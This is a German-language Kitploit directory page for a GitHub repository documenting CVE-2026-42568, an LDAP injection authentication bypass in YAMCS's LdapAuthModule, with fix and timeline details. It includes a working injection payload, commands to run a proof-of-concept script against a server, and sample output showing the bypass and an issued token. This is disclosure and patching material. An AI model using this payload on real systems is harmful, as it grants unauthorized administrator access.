Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42568 — In org.yamcs.security.LdapAuthModule besteht eine LDAP-Injection-Schwachstelle. Der Benutzername-Parameter wird ohne RFC-4515-Escaping direkt in LDAP-Suchfilter eingefügt, was eine Umgehung der Authentifizierung ermöglicht. | Kitploit
Tools/GitHubGitHub/ex-cal1bur/cve-2026-42568
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

In org.yamcs.security.LdapAuthModule besteht eine LDAP-Injection-Schwachstelle. Der Benutzername-Parameter wird ohne RFC-4515-Escaping direkt in LDAP-Suchfilter eingefügt, was eine Umgehung der Authentifizierung ermöglicht.

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-42568 — YAMCS-LDAP-Injection in LdapAuthModule

Zusammenfassung

In org.yamcs.security.LdapAuthModule besteht eine LDAP-Injection-Schwachstelle. Der Benutzername-Parameter wird ohne RFC-4515-Escaping direkt in LDAP-Suchfilter eingefügt, was einen Authentifizierungs-Bypass ermöglicht.

FeldWert
CVECVE-2026-42568
SchweregradMITTEL
CWECWE-90: Unzureichende Neutralisierung spezieller Elemente in einer LDAP-Abfrage
Betroffenyamcs-core < 5.12.7 (mit konfigurierter LDAP-Authentifizierung)
Behoben inyamcs-core 5.12.7
AdvisoryGHSA-cqh3-jg8p-336j

Schwachstellendetails

Ursache (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

Mit einem typischen userFilter von (uid={0}) bricht ein bösartiger Benutzername die Filterstruktur auf:

root@kitploit:~
Input:  *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed

Proof of Concept

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

Erwartete Ausgabe auf einer verwundbaren Instanz (mit konfiguriertem LDAP):

root@kitploit:~
[1] Universal bypass (any account)
     Username: *)(uid=*))(|(uid=*
     Password: anything
     Result:   HTTP 200
     [!!!] AUTHENTICATION BYPASSED
     [!!!] Token received: eyJhbGciOiJSUzI1NiJ9...

Hinweis: Diese Schwachstelle betrifft nur YAMCS-Instanzen, bei denen LdapAuthModule konfiguriert ist. Standardinstallationen mit integrierter Authentifizierung sind nicht betroffen.

Auswirkungen

Ein nicht authentifizierter Angreifer, der den YAMCS-Server erreichen kann, kann bei konfigurierter LDAP-Authentifizierung die Authentifizierung vollständig umgehen und sich Zugang als beliebiger Benutzer verschaffen, einschließlich Administratoren.

Behebung

Upgrade auf yamcs-core >= 5.12.7.

Der Fix wendet RFC-4515-Escaping auf den Benutzernamen an, bevor der LDAP-Filter erstellt wird.

Zeitverlauf

DatumEreignis
2026-05Schwachstelle gemeldet
2026-05-26Fix in yamcs-core 5.12.7 veröffentlicht
2026-05-26Öffentliches Advisory veröffentlicht

Forscher

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
Tool herunterladen